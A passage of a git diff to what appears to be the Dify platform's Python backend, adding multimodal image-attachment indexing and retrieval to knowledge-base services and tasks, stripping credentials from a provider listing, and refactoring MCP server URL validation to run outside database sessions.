segment vector index VectorService.update_segment_vector(args.keywords, segment, dataset) @@ -2976,7 +3054,7 @@ class SegmentService: db.session.add(document) db.session.add(segment) db.session.commit() - if document.doc_form == IndexType.PARENT_CHILD_INDEX and args.regenerate_child_chunks: + if document.doc_form == IndexStructureType.PARENT_CHILD_INDEX and args.regenerate_child_chunks: # get embedding model instance if dataset.indexing_technique == "high_quality": # check embedding model setting @@ -3002,15 +3080,15 @@ class SegmentService: .where(DatasetProcessRule.id == document.dataset_process_rule_id) .first() ) - if not processing_rule: - raise ValueError("No processing rule found.") - VectorService.generate_child_chunks( - segment, document, dataset, embedding_model_instance, processing_rule, True - ) - elif document.doc_form in (IndexType.PARAGRAPH_INDEX, IndexType.QA_INDEX): + if processing_rule: + VectorService.generate_child_chunks( + segment, document, dataset, embedding_model_instance, processing_rule, True + ) + elif document.doc_form in (IndexStructureType.PARAGRAPH_INDEX, IndexStructureType.QA_INDEX): # update segment vector index VectorService.update_segment_vector(args.keywords, segment, dataset) - + # update multimodel vector index + VectorService.update_multimodel_vector(segment, args.attachment_ids or [], dataset) except Exception as e: 
logger.exception("update segment index failed") segment.enabled = False @@ -3048,7 +3126,9 @@ class SegmentService: ) child_node_ids = [chunk[0] for chunk in child_chunks if chunk[0]] - delete_segment_from_index_task.delay([segment.index_node_id], dataset.id, document.id, child_node_ids) + delete_segment_from_index_task.delay( + [segment.index_node_id], dataset.id, document.id, [segment.id], child_node_ids + ) db.session.delete(segment) # update document word count @@ -3097,7 +3177,9 @@ class SegmentService: # Start async cleanup with both parent and child node IDs if index_node_ids or child_node_ids: - delete_segment_from_index_task.delay(index_node_ids, dataset.id, document.id, child_node_ids) + delete_segment_from_index_task.delay( + index_node_ids, dataset.id, document.id, segment_db_ids, child_node_ids + ) if document.word_count is None: document.word_count = 0 diff --git a/api/services/datasource_provider_service.py b/api/services/datasource_provider_service.py index 81e0c0ecd4..eeb14072bd 100644 --- a/api/services/datasource_provider_service.py +++ b/api/services/datasource_provider_service.py @@ -29,8 +29,14 @@ def get_current_user(): from models.account import Account from models.model import EndUser - if not isinstance(current_user._get_current_object(), (Account, EndUser)): # type: ignore - raise TypeError(f"current_user must be Account or EndUser, got {type(current_user).__name__}") + try: + user_object = current_user._get_current_object() + except AttributeError: + # Handle case where current_user might not be a LocalProxy in test environments + user_object = current_user + + if not isinstance(user_object, (Account, EndUser)): + raise TypeError(f"current_user must be Account or EndUser, got {type(user_object).__name__}") return current_user diff --git a/api/services/entities/knowledge_entities/knowledge_entities.py b/api/services/entities/knowledge_entities/knowledge_entities.py index 131e90e195..7959734e89 100644 --- a/api/services/entities/knowledge_entities/knowledge_entities.py +++ b/api/services/entities/knowledge_entities/knowledge_entities.py @@ -124,6 +124,14 @@ class KnowledgeConfig(BaseModel): embedding_model: str | None = None embedding_model_provider: str | None = None name: str | None = None + is_multimodal: bool = False + + +class SegmentCreateArgs(BaseModel): + content: str | None = None + answer: str | None = None + keywords: list[str] | None = None + attachment_ids: list[str] | None = None class SegmentUpdateArgs(BaseModel): @@ -132,6 +140,7 @@ class SegmentUpdateArgs(BaseModel): keywords: list[str] | None = None regenerate_child_chunks: bool = False enabled: bool | None = None + attachment_ids: list[str] | None = None class ChildChunkUpdateArgs(BaseModel): diff --git a/api/services/entities/knowledge_entities/rag_pipeline_entities.py b/api/services/entities/knowledge_entities/rag_pipeline_entities.py index a97ccab914..cbb0efcc2a 100644 --- a/api/services/entities/knowledge_entities/rag_pipeline_entities.py +++ b/api/services/entities/knowledge_entities/rag_pipeline_entities.py @@ -23,7 +23,7 @@ class RagPipelineDatasetCreateEntity(BaseModel): description: str icon_info: IconInfo permission: str - partial_member_list: list[str] | None = None + partial_member_list: list[dict[str, str]] | None = None yaml_content: str | None = None diff --git a/api/services/external_knowledge_service.py b/api/services/external_knowledge_service.py index 27936f6278..40faa85b9a 100644 --- a/api/services/external_knowledge_service.py +++ b/api/services/external_knowledge_service.py 
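The `get_current_user` guard above tolerates both a werkzeug `LocalProxy` and a plain object (as injected in tests); the unwrapping step in isolation:

```python
def unwrap_current_user(obj):
    """Return the concrete object behind a LocalProxy, or the object itself."""
    try:
        return obj._get_current_object()
    except AttributeError:
        return obj  # already a plain Account/EndUser, e.g. in unit tests
```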
@@ -324,4 +324,5 @@ class ExternalDatasetService: ) if response.status_code == 200: return cast(list[Any], response.json().get("records", [])) - return [] + else: + raise ValueError(response.text) diff --git a/api/services/file_service.py b/api/services/file_service.py index 1980cd8d59..0911cf38c4 100644 --- a/api/services/file_service.py +++ b/api/services/file_service.py @@ -1,3 +1,4 @@ +import base64 import hashlib import os import uuid @@ -123,6 +124,15 @@ class FileService: return file_size <= file_size_limit + def get_file_base64(self, file_id: str) -> str: + upload_file = ( + self._session_maker(expire_on_commit=False).query(UploadFile).where(UploadFile.id == file_id).first() + ) + if not upload_file: + raise NotFound("File not found") + blob = storage.load_once(upload_file.key) + return base64.b64encode(blob).decode() + def upload_text(self, text: str, text_name: str, user_id: str, tenant_id: str) -> UploadFile: if len(text_name) > 200: text_name = text_name[:200] diff --git a/api/services/hit_testing_service.py b/api/services/hit_testing_service.py index dfb49cf2bd..8cbf3a25c3 100644 --- a/api/services/hit_testing_service.py +++ b/api/services/hit_testing_service.py @@ -1,3 +1,4 @@ +import json import logging import time from typing import Any @@ -5,6 +6,7 @@ from typing import Any from core.app.app_config.entities import ModelConfig from core.model_runtime.entities import LLMMode from core.rag.datasource.retrieval_service import RetrievalService +from core.rag.index_processor.constant.query_type import QueryType from core.rag.models.document import Document from core.rag.retrieval.dataset_retrieval import DatasetRetrieval from core.rag.retrieval.retrieval_methods import RetrievalMethod @@ -32,6 +34,7 @@ class HitTestingService: account: Account, retrieval_model: Any, # FIXME drop this any external_retrieval_model: dict, + attachment_ids: list | None = None, limit: int = 10, ): start = time.perf_counter() @@ -41,7 +44,7 @@ class HitTestingService: retrieval_model = dataset.retrieval_model or default_retrieval_model document_ids_filter = None metadata_filtering_conditions = retrieval_model.get("metadata_filtering_conditions", {}) - if metadata_filtering_conditions: + if metadata_filtering_conditions and query: dataset_retrieval = DatasetRetrieval() from core.app.app_config.entities import MetadataFilteringCondition @@ -66,6 +69,7 @@ class HitTestingService: retrieval_method=RetrievalMethod(retrieval_model.get("search_method", RetrievalMethod.SEMANTIC_SEARCH)), dataset_id=dataset.id, query=query, + attachment_ids=attachment_ids, top_k=retrieval_model.get("top_k", 4), score_threshold=retrieval_model.get("score_threshold", 0.0) if retrieval_model["score_threshold_enabled"] @@ -80,17 +84,24 @@ class HitTestingService: end = time.perf_counter() logger.debug("Hit testing retrieve in %s seconds", end - start) - - dataset_query = DatasetQuery( - dataset_id=dataset.id, - content=query, - source="hit_testing", - source_app_id=None, - created_by_role="account", - created_by=account.id, - ) - - db.session.add(dataset_query) + dataset_queries = [] + if query: + content = {"content_type": QueryType.TEXT_QUERY, "content": query} + dataset_queries.append(content) + if attachment_ids: + for attachment_id in attachment_ids: + content = {"content_type": QueryType.IMAGE_QUERY, "content": attachment_id} + dataset_queries.append(content) + if dataset_queries: + dataset_query = DatasetQuery( + dataset_id=dataset.id, + content=json.dumps(dataset_queries), + source="hit_testing", + source_app_id=None, + 
created_by_role="account", + created_by=account.id, + ) + db.session.add(dataset_query) db.session.commit() return cls.compact_retrieve_response(query, all_documents) @@ -167,10 +178,15 @@ class HitTestingService: @classmethod def hit_testing_args_check(cls, args): - query = args["query"] + query = args.get("query") + attachment_ids = args.get("attachment_ids") - if not query or len(query) > 250: - raise ValueError("Query is required and cannot exceed 250 characters") + if not attachment_ids and not query: + raise ValueError("Query or attachment_ids is required") + if query and len(query) > 250: + raise ValueError("Query cannot exceed 250 characters") + if attachment_ids and not isinstance(attachment_ids, list): + raise ValueError("Attachment_ids must be a list") @staticmethod def escape_query_for_search(query: str) -> str: diff --git a/api/services/model_provider_service.py b/api/services/model_provider_service.py index a9e2c72534..eea382febe 100644 --- a/api/services/model_provider_service.py +++ b/api/services/model_provider_service.py @@ -70,9 +70,28 @@ class ModelProviderService: continue provider_config = provider_configuration.custom_configuration.provider - model_config = provider_configuration.custom_configuration.models + models = provider_configuration.custom_configuration.models can_added_models = provider_configuration.custom_configuration.can_added_models + # IMPORTANT: Never expose decrypted credentials in the provider list API. + # Sanitize custom model configurations by dropping the credentials payload. + sanitized_model_config = [] + if models: + from core.entities.provider_entities import CustomModelConfiguration # local import to avoid cycles + + for model in models: + sanitized_model_config.append( + CustomModelConfiguration( + model=model.model, + model_type=model.model_type, + credentials=None, # strip secrets from list view + current_credential_id=model.current_credential_id, + current_credential_name=model.current_credential_name, + available_model_credentials=model.available_model_credentials, + unadded_to_model_list=model.unadded_to_model_list, + ) + ) + provider_response = ProviderResponse( tenant_id=tenant_id, provider=provider_configuration.provider.provider, @@ -95,7 +114,7 @@ class ModelProviderService: current_credential_id=getattr(provider_config, "current_credential_id", None), current_credential_name=getattr(provider_config, "current_credential_name", None), available_credentials=getattr(provider_config, "available_credentials", []), - custom_models=model_config, + custom_models=sanitized_model_config, can_added_models=can_added_models, ), system_configuration=SystemConfigurationResponse( diff --git a/api/services/rag_pipeline/rag_pipeline.py b/api/services/rag_pipeline/rag_pipeline.py index 097d16e2a7..f53448e7fe 100644 --- a/api/services/rag_pipeline/rag_pipeline.py +++ b/api/services/rag_pipeline/rag_pipeline.py @@ -1248,14 +1248,13 @@ class RagPipelineService: session.commit() return workflow_node_execution_db_model - def get_recommended_plugins(self) -> dict: + def get_recommended_plugins(self, type: str) -> dict: # Query active recommended plugins - pipeline_recommended_plugins = ( - db.session.query(PipelineRecommendedPlugin) - .where(PipelineRecommendedPlugin.active == True) - .order_by(PipelineRecommendedPlugin.position.asc()) - .all() - ) + query = db.session.query(PipelineRecommendedPlugin).where(PipelineRecommendedPlugin.active == True) + if type and type != "all": + query = query.where(PipelineRecommendedPlugin.type == type) + + 
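The reworked hit-testing validation above accepts text, images, or both, and the stored `DatasetQuery.content` becomes a JSON list of typed entries. A self-contained sketch of those rules; the `"text_query"`/`"image_query"` strings are assumed values standing in for the real `QueryType` constants:

```python
import json

TEXT_QUERY = "text_query"    # assumed; real value lives in QueryType.TEXT_QUERY
IMAGE_QUERY = "image_query"  # assumed; real value lives in QueryType.IMAGE_QUERY


def check_args(args: dict) -> None:
    """Mirrors hit_testing_args_check from the hunk above."""
    query = args.get("query")
    attachment_ids = args.get("attachment_ids")
    if not attachment_ids and not query:
        raise ValueError("Query or attachment_ids is required")
    if query and len(query) > 250:
        raise ValueError("Query cannot exceed 250 characters")
    if attachment_ids and not isinstance(attachment_ids, list):
        raise ValueError("Attachment_ids must be a list")


def build_query_log(query: str | None, attachment_ids: list[str] | None) -> str:
    """Shape of the JSON now persisted in DatasetQuery.content."""
    entries = []
    if query:
        entries.append({"content_type": TEXT_QUERY, "content": query})
    for attachment_id in attachment_ids or []:
        entries.append({"content_type": IMAGE_QUERY, "content": attachment_id})
    return json.dumps(entries)


check_args({"query": "what is dify?"})      # text-only is valid
check_args({"attachment_ids": ["file-1"]})  # image-only is now valid too
print(build_query_log("what is dify?", ["file-1"]))
```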
pipeline_recommended_plugins = query.order_by(PipelineRecommendedPlugin.position.asc()).all() if not pipeline_recommended_plugins: return { diff --git a/api/services/tools/mcp_tools_manage_service.py b/api/services/tools/mcp_tools_manage_service.py index d641fe0315..252be77b27 100644 --- a/api/services/tools/mcp_tools_manage_service.py +++ b/api/services/tools/mcp_tools_manage_service.py @@ -15,7 +15,6 @@ from sqlalchemy.orm import Session from core.entities.mcp_provider import MCPAuthentication, MCPConfiguration, MCPProviderEntity from core.helper import encrypter from core.helper.provider_cache import NoOpProviderCredentialCache -from core.helper.tool_provider_cache import ToolProviderListCache from core.mcp.auth.auth_flow import auth from core.mcp.auth_client import MCPClientWithAuthRetry from core.mcp.error import MCPAuthError, MCPError @@ -65,6 +64,15 @@ class ServerUrlValidationResult(BaseModel): return self.needs_validation and self.validation_passed and self.reconnect_result is not None +class ProviderUrlValidationData(BaseModel): + """Data required for URL validation, extracted from database to perform network operations outside of session""" + + current_server_url_hash: str + headers: dict[str, str] + timeout: float | None + sse_read_timeout: float | None + + class MCPToolManageService: """Service class for managing MCP tools and providers.""" @@ -166,9 +174,6 @@ class MCPToolManageService: self._session.add(mcp_tool) self._session.flush() - # Invalidate tool providers cache - ToolProviderListCache.invalidate_cache(tenant_id) - mcp_providers = ToolTransformService.mcp_provider_to_user_provider(mcp_tool, for_list=True) return mcp_providers @@ -192,7 +197,7 @@ class MCPToolManageService: Update an MCP provider. Args: - validation_result: Pre-validation result from validate_server_url_change. + validation_result: Pre-validation result from validate_server_url_standalone. If provided and contains reconnect_result, it will be used instead of performing network operations. """ @@ -251,8 +256,6 @@ class MCPToolManageService: # Flush changes to database self._session.flush() - # Invalidate tool providers cache - ToolProviderListCache.invalidate_cache(tenant_id) except IntegrityError as e: self._handle_integrity_error(e, name, server_url, server_identifier) @@ -261,9 +264,6 @@ class MCPToolManageService: mcp_tool = self.get_provider(provider_id=provider_id, tenant_id=tenant_id) self._session.delete(mcp_tool) - # Invalidate tool providers cache - ToolProviderListCache.invalidate_cache(tenant_id) - def list_providers( self, *, tenant_id: str, for_list: bool = False, include_sensitive: bool = True ) -> list[ToolProviderApiEntity]: @@ -546,30 +546,39 @@ class MCPToolManageService: ) return self.execute_auth_actions(auth_result) - def _reconnect_provider(self, *, server_url: str, provider: MCPToolProvider) -> ReconnectResult: - """Attempt to reconnect to MCP provider with new server URL.""" + def get_provider_for_url_validation(self, *, tenant_id: str, provider_id: str) -> ProviderUrlValidationData: + """ + Get provider data required for URL validation. + This method performs database read and should be called within a session. 
+ + Returns: + ProviderUrlValidationData: Data needed for standalone URL validation + """ + provider = self.get_provider(provider_id=provider_id, tenant_id=tenant_id) provider_entity = provider.to_entity() - headers = provider_entity.headers + return ProviderUrlValidationData( + current_server_url_hash=provider.server_url_hash, + headers=provider_entity.headers, + timeout=provider_entity.timeout, + sse_read_timeout=provider_entity.sse_read_timeout, + ) - try: - tools = self._retrieve_remote_mcp_tools(server_url, headers, provider_entity) - return ReconnectResult( - authed=True, - tools=json.dumps([tool.model_dump() for tool in tools]), - encrypted_credentials=EMPTY_CREDENTIALS_JSON, - ) - except MCPAuthError: - return ReconnectResult(authed=False, tools=EMPTY_TOOLS_JSON, encrypted_credentials=EMPTY_CREDENTIALS_JSON) - except MCPError as e: - raise ValueError(f"Failed to re-connect MCP server: {e}") from e - - def validate_server_url_change( - self, *, tenant_id: str, provider_id: str, new_server_url: str + @staticmethod + def validate_server_url_standalone( + *, + tenant_id: str, + new_server_url: str, + validation_data: ProviderUrlValidationData, ) -> ServerUrlValidationResult: """ Validate server URL change by attempting to connect to the new server. - This method should be called BEFORE update_provider to perform network operations - outside of the database transaction. + This method performs network operations and MUST be called OUTSIDE of any database session + to avoid holding locks during network I/O. + + Args: + tenant_id: Tenant ID for encryption + new_server_url: The new server URL to validate + validation_data: Provider data obtained from get_provider_for_url_validation Returns: ServerUrlValidationResult: Validation result with connection status and tools if successful @@ -579,25 +588,30 @@ class MCPToolManageService: return ServerUrlValidationResult(needs_validation=False) # Validate URL format - if not self._is_valid_url(new_server_url): + parsed = urlparse(new_server_url) + if not all([parsed.scheme, parsed.netloc]) or parsed.scheme not in ["http", "https"]: raise ValueError("Server URL is not valid.") # Always encrypt and hash the URL encrypted_server_url = encrypter.encrypt_token(tenant_id, new_server_url) new_server_url_hash = hashlib.sha256(new_server_url.encode()).hexdigest() - # Get current provider - provider = self.get_provider(provider_id=provider_id, tenant_id=tenant_id) - # Check if URL is actually different - if new_server_url_hash == provider.server_url_hash: + if new_server_url_hash == validation_data.current_server_url_hash: # URL hasn't changed, but still return the encrypted data return ServerUrlValidationResult( - needs_validation=False, encrypted_server_url=encrypted_server_url, server_url_hash=new_server_url_hash + needs_validation=False, + encrypted_server_url=encrypted_server_url, + server_url_hash=new_server_url_hash, ) - # Perform validation by attempting to connect - reconnect_result = self._reconnect_provider(server_url=new_server_url, provider=provider) + # Perform network validation - this is the expensive operation that should be outside session + reconnect_result = MCPToolManageService._reconnect_with_url( + server_url=new_server_url, + headers=validation_data.headers, + timeout=validation_data.timeout, + sse_read_timeout=validation_data.sse_read_timeout, + ) return ServerUrlValidationResult( needs_validation=True, validation_passed=True, @@ -606,6 +620,38 @@ class MCPToolManageService: server_url_hash=new_server_url_hash, ) + @staticmethod + def 
_reconnect_with_url( + *, + server_url: str, + headers: dict[str, str], + timeout: float | None, + sse_read_timeout: float | None, + ) -> ReconnectResult: + """ + Attempt to connect to MCP server with given URL. + This is a static method that performs network I/O without database access. + """ + from core.mcp.mcp_client import MCPClient + + try: + with MCPClient( + server_url=server_url, + headers=headers, + timeout=timeout, + sse_read_timeout=sse_read_timeout, + ) as mcp_client: + tools = mcp_client.list_tools() + return ReconnectResult( + authed=True, + tools=json.dumps([tool.model_dump() for tool in tools]), + encrypted_credentials=EMPTY_CREDENTIALS_JSON, + ) + except MCPAuthError: + return ReconnectResult(authed=False, tools=EMPTY_TOOLS_JSON, encrypted_credentials=EMPTY_CREDENTIALS_JSON) + except MCPError as e: + raise ValueError(f"Failed to re-connect MCP server: {e}") from e + def _build_tool_provider_response( self, db_provider: MCPToolProvider, provider_entity: MCPProviderEntity, tools: list ) -> ToolProviderApiEntity: diff --git a/api/services/trigger/webhook_service.py b/api/services/trigger/webhook_service.py index 4b3e1330fd..5c4607d400 100644 --- a/api/services/trigger/webhook_service.py +++ b/api/services/trigger/webhook_service.py @@ -33,6 +33,11 @@ from services.errors.app import QuotaExceededError from services.trigger.app_trigger_service import AppTriggerService from services.workflow.entities import WebhookTriggerData +try: + import magic +except ImportError: + magic = None # type: ignore[assignment] + logger = logging.getLogger(__name__) @@ -317,7 +322,8 @@ class WebhookService: try: file_content = request.get_data() if file_content: - file_obj = cls._create_file_from_binary(file_content, "application/octet-stream", webhook_trigger) + mimetype = cls._detect_binary_mimetype(file_content) + file_obj = cls._create_file_from_binary(file_content, mimetype, webhook_trigger) return {"raw": file_obj.to_dict()}, {} else: return {"raw": None}, {} @@ -341,6 +347,18 @@ class WebhookService: body = {"raw": ""} return body, {} + @staticmethod + def _detect_binary_mimetype(file_content: bytes) -> str: + """Guess MIME type for binary payloads using python-magic when available.""" + if magic is not None: + try: + detected = magic.from_buffer(file_content[:1024], mime=True) + if detected: + return detected + except Exception: + logger.debug("python-magic detection failed for octet-stream payload") + return "application/octet-stream" + @classmethod def _process_file_uploads( cls, files: Mapping[str, FileStorage], webhook_trigger: WorkflowWebhookTrigger diff --git a/api/services/variable_truncator.py b/api/services/variable_truncator.py index 6eb8d0031d..0f969207cf 100644 --- a/api/services/variable_truncator.py +++ b/api/services/variable_truncator.py @@ -410,9 +410,12 @@ class VariableTruncator(BaseTruncator): @overload def _truncate_json_primitives(self, val: None, target_size: int) -> _PartResult[None]: ... + @overload + def _truncate_json_primitives(self, val: File, target_size: int) -> _PartResult[File]: ... 
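The MCP refactor above splits a server-URL change into three phases so network I/O never runs while a database session is open. A sketch of the intended call sequence under stated assumptions: `FakeSession` and `FakeService` stand in for the real session and `MCPToolManageService`, and `update_provider`'s full signature is not shown in the hunk, so its keyword arguments here are illustrative.

```python
class FakeSession:
    """Stand-in for a SQLAlchemy session."""

    def __enter__(self):
        return self

    def __exit__(self, *exc):
        return False

    def commit(self):
        print("commit")


class FakeService:
    """Stand-in for MCPToolManageService with the split API."""

    def __init__(self, session):
        self.session = session

    def get_provider_for_url_validation(self, *, tenant_id, provider_id):
        print("phase 1: read hash/headers/timeouts inside a session")
        return {"hash": "...", "headers": {}, "timeout": 30.0}

    @staticmethod
    def validate_server_url_standalone(*, tenant_id, new_server_url, validation_data):
        print("phase 2: network round-trip with NO session held")
        return {"needs_validation": True, "validation_passed": True}

    def update_provider(self, *, tenant_id, provider_id, server_url, validation_result):
        print("phase 3: persist the pre-validated result inside a session")


def update_server_url(tenant_id: str, provider_id: str, new_url: str) -> None:
    with FakeSession() as session:  # phase 1
        data = FakeService(session).get_provider_for_url_validation(
            tenant_id=tenant_id, provider_id=provider_id)

    result = FakeService.validate_server_url_standalone(  # phase 2
        tenant_id=tenant_id, new_server_url=new_url, validation_data=data)

    with FakeSession() as session:  # phase 3
        FakeService(session).update_provider(
            tenant_id=tenant_id, provider_id=provider_id,
            server_url=new_url, validation_result=result)
        session.commit()


update_server_url("tenant-1", "provider-1", "https://mcp.example.com")
```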
+ def _truncate_json_primitives( self, - val: UpdatedVariable | str | list[object] | dict[str, object] | bool | int | float | None, + val: UpdatedVariable | File | str | list[object] | dict[str, object] | bool | int | float | None, target_size: int, ) -> _PartResult[Any]: """Truncate a value within an object to fit within budget.""" @@ -425,6 +428,9 @@ class VariableTruncator(BaseTruncator): return self._truncate_array(val, target_size) elif isinstance(val, dict): return self._truncate_object(val, target_size) + elif isinstance(val, File): + # File objects should not be truncated, return as-is + return _PartResult(val, self.calculate_json_size(val), False) elif val is None or isinstance(val, (bool, int, float)): return _PartResult(val, self.calculate_json_size(val), False) else: diff --git a/api/services/vector_service.py b/api/services/vector_service.py index abc92a0181..f1fa33cb75 100644 --- a/api/services/vector_service.py +++ b/api/services/vector_service.py @@ -4,11 +4,14 @@ from core.model_manager import ModelInstance, ModelManager from core.model_runtime.entities.model_entities import ModelType from core.rag.datasource.keyword.keyword_factory import Keyword from core.rag.datasource.vdb.vector_factory import Vector -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType +from core.rag.index_processor.index_processor_base import BaseIndexProcessor from core.rag.index_processor.index_processor_factory import IndexProcessorFactory -from core.rag.models.document import Document +from core.rag.models.document import AttachmentDocument, Document from extensions.ext_database import db -from models.dataset import ChildChunk, Dataset, DatasetProcessRule, DocumentSegment +from models import UploadFile +from models.dataset import ChildChunk, Dataset, DatasetProcessRule, DocumentSegment, SegmentAttachmentBinding from models.dataset import Document as DatasetDocument from services.entities.knowledge_entities.knowledge_entities import ParentMode @@ -21,9 +24,10 @@ class VectorService: cls, keywords_list: list[list[str]] | None, segments: list[DocumentSegment], dataset: Dataset, doc_form: str ): documents: list[Document] = [] + multimodal_documents: list[AttachmentDocument] = [] for segment in segments: - if doc_form == IndexType.PARENT_CHILD_INDEX: + if doc_form == IndexStructureType.PARENT_CHILD_INDEX: dataset_document = db.session.query(DatasetDocument).filter_by(id=segment.document_id).first() if not dataset_document: logger.warning( @@ -70,12 +74,29 @@ class VectorService: "doc_hash": segment.index_node_hash, "document_id": segment.document_id, "dataset_id": segment.dataset_id, + "doc_type": DocType.TEXT, }, ) documents.append(rag_document) + if dataset.is_multimodal: + for attachment in segment.attachments: + multimodal_document: AttachmentDocument = AttachmentDocument( + page_content=attachment["name"], + metadata={ + "doc_id": attachment["id"], + "doc_hash": "", + "document_id": segment.document_id, + "dataset_id": segment.dataset_id, + "doc_type": DocType.IMAGE, + }, + ) + multimodal_documents.append(multimodal_document) + index_processor: BaseIndexProcessor = IndexProcessorFactory(doc_form).init_index_processor() + if len(documents) > 0: - index_processor = IndexProcessorFactory(doc_form).init_index_processor() - index_processor.load(dataset, documents, with_keywords=True, keywords_list=keywords_list) + index_processor.load(dataset, 
documents, None, with_keywords=True, keywords_list=keywords_list) + if len(multimodal_documents) > 0: + index_processor.load(dataset, [], multimodal_documents, with_keywords=False) @classmethod def update_segment_vector(cls, keywords: list[str] | None, segment: DocumentSegment, dataset: Dataset): @@ -130,6 +151,7 @@ class VectorService: "doc_hash": segment.index_node_hash, "document_id": segment.document_id, "dataset_id": segment.dataset_id, + "doc_type": DocType.TEXT, }, ) # use full doc mode to generate segment's child chunk @@ -226,3 +248,92 @@ class VectorService: def delete_child_chunk_vector(cls, child_chunk: ChildChunk, dataset: Dataset): vector = Vector(dataset=dataset) vector.delete_by_ids([child_chunk.index_node_id]) + + @classmethod + def update_multimodel_vector(cls, segment: DocumentSegment, attachment_ids: list[str], dataset: Dataset): + if dataset.indexing_technique != "high_quality": + return + + attachments = segment.attachments + old_attachment_ids = [attachment["id"] for attachment in attachments] if attachments else [] + + # Check if there's any actual change needed + if set(attachment_ids) == set(old_attachment_ids): + return + + try: + vector = Vector(dataset=dataset) + if dataset.is_multimodal: + # Delete old vectors if they exist + if old_attachment_ids: + vector.delete_by_ids(old_attachment_ids) + + # Delete existing segment attachment bindings in one operation + db.session.query(SegmentAttachmentBinding).where(SegmentAttachmentBinding.segment_id == segment.id).delete( + synchronize_session=False + ) + + if not attachment_ids: + db.session.commit() + return + + # Bulk fetch upload files - only fetch needed fields + upload_file_list = db.session.query(UploadFile).where(UploadFile.id.in_(attachment_ids)).all() + + if not upload_file_list: + db.session.commit() + return + + # Create a mapping for quick lookup + upload_file_map = {upload_file.id: upload_file for upload_file in upload_file_list} + + # Prepare batch operations + bindings = [] + documents = [] + + # Create common metadata base to avoid repetition + base_metadata = { + "doc_hash": "", + "document_id": segment.document_id, + "dataset_id": segment.dataset_id, + "doc_type": DocType.IMAGE, + } + + # Process attachments in the order specified by attachment_ids + for attachment_id in attachment_ids: + upload_file = upload_file_map.get(attachment_id) + if not upload_file: + logger.warning("Upload file not found for attachment_id: %s", attachment_id) + continue + + # Create segment attachment binding + bindings.append( + SegmentAttachmentBinding( + tenant_id=segment.tenant_id, + dataset_id=segment.dataset_id, + document_id=segment.document_id, + segment_id=segment.id, + attachment_id=upload_file.id, + ) + ) + + # Create document for vector indexing + documents.append( + Document(page_content=upload_file.name, metadata={**base_metadata, "doc_id": upload_file.id}) + ) + + # Bulk insert all bindings at once + if bindings: + db.session.add_all(bindings) + + # Add documents to vector store if any + if documents and dataset.is_multimodal: + vector.add_texts(documents, duplicate_check=True) + + # Single commit for all operations + db.session.commit() + + except Exception: + logger.exception("Failed to update multimodal vector for segment %s", segment.id) + db.session.rollback() + raise diff --git a/api/tasks/add_document_to_index_task.py b/api/tasks/add_document_to_index_task.py index 933ad6b9e2..e7dead8a56 100644 --- a/api/tasks/add_document_to_index_task.py +++ b/api/tasks/add_document_to_index_task.py @@ -4,9 +4,10 @@ 
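Several tasks in this patch now build two document lists per segment: plain-text `Document`s plus, when `dataset.is_multimodal`, `AttachmentDocument`s keyed by upload-file id with `doc_type: IMAGE`. A condensed sketch of that shape, using a dataclass stand-in for the real RAG document models:

```python
from dataclasses import dataclass, field


@dataclass
class Doc:
    """Stand-in for core.rag.models.document Document/AttachmentDocument."""

    page_content: str
    metadata: dict = field(default_factory=dict)


def build_index_payload(segment: dict, is_multimodal: bool):
    text_docs = [
        Doc(
            page_content=segment["content"],
            metadata={
                "doc_id": segment["index_node_id"],
                "doc_hash": segment["index_node_hash"],
                "doc_type": "text",  # DocType.TEXT in the real code
            },
        )
    ]
    image_docs = []
    if is_multimodal:
        for attachment in segment["attachments"]:
            image_docs.append(
                Doc(
                    page_content=attachment["name"],  # file name as content
                    metadata={
                        "doc_id": attachment["id"],   # upload-file id as node id
                        "doc_hash": "",
                        "doc_type": "image",          # DocType.IMAGE
                    },
                )
            )
    return text_docs, image_docs


segment = {
    "content": "chunk text",
    "index_node_id": "n1",
    "index_node_hash": "h1",
    "attachments": [{"id": "file-1", "name": "diagram.png"}],
}
texts, images = build_index_payload(segment, is_multimodal=True)
# The tasks then call:
#   index_processor.load(dataset, texts, multimodal_documents=images)
```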
import time import click from celery import shared_task -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_factory import IndexProcessorFactory -from core.rag.models.document import ChildDocument, Document +from core.rag.models.document import AttachmentDocument, ChildDocument, Document from extensions.ext_database import db from extensions.ext_redis import redis_client from libs.datetime_utils import naive_utc_now @@ -55,6 +56,7 @@ def add_document_to_index_task(dataset_document_id: str): ) documents = [] + multimodal_documents = [] for segment in segments: document = Document( page_content=segment.content, @@ -65,7 +67,7 @@ def add_document_to_index_task(dataset_document_id: str): "dataset_id": segment.dataset_id, }, ) - if dataset_document.doc_form == IndexType.PARENT_CHILD_INDEX: + if dataset_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX: child_chunks = segment.get_child_chunks() if child_chunks: child_documents = [] @@ -81,11 +83,25 @@ def add_document_to_index_task(dataset_document_id: str): ) child_documents.append(child_document) document.children = child_documents + if dataset.is_multimodal: + for attachment in segment.attachments: + multimodal_documents.append( + AttachmentDocument( + page_content=attachment["name"], + metadata={ + "doc_id": attachment["id"], + "doc_hash": "", + "document_id": segment.document_id, + "dataset_id": segment.dataset_id, + "doc_type": DocType.IMAGE, + }, + ) + ) documents.append(document) index_type = dataset.doc_form index_processor = IndexProcessorFactory(index_type).init_index_processor() - index_processor.load(dataset, documents) + index_processor.load(dataset, documents, multimodal_documents=multimodal_documents) # delete auto disable log db.session.query(DatasetAutoDisableLog).where(DatasetAutoDisableLog.document_id == dataset_document.id).delete() diff --git a/api/tasks/annotation/batch_import_annotations_task.py b/api/tasks/annotation/batch_import_annotations_task.py index 8e46e8d0e3..775814318b 100644 --- a/api/tasks/annotation/batch_import_annotations_task.py +++ b/api/tasks/annotation/batch_import_annotations_task.py @@ -30,6 +30,8 @@ def batch_import_annotations_task(job_id: str, content_list: list[dict], app_id: logger.info(click.style(f"Start batch import annotation: {job_id}", fg="green")) start_at = time.perf_counter() indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}" + active_jobs_key = f"annotation_import_active:{tenant_id}" + # get app info app = db.session.query(App).where(App.id == app_id, App.tenant_id == tenant_id, App.status == "normal").first() @@ -91,4 +93,13 @@ def batch_import_annotations_task(job_id: str, content_list: list[dict], app_id: redis_client.setex(indexing_error_msg_key, 600, str(e)) logger.exception("Build index for batch import annotations failed") finally: + # Clean up active job tracking to release concurrency slot + 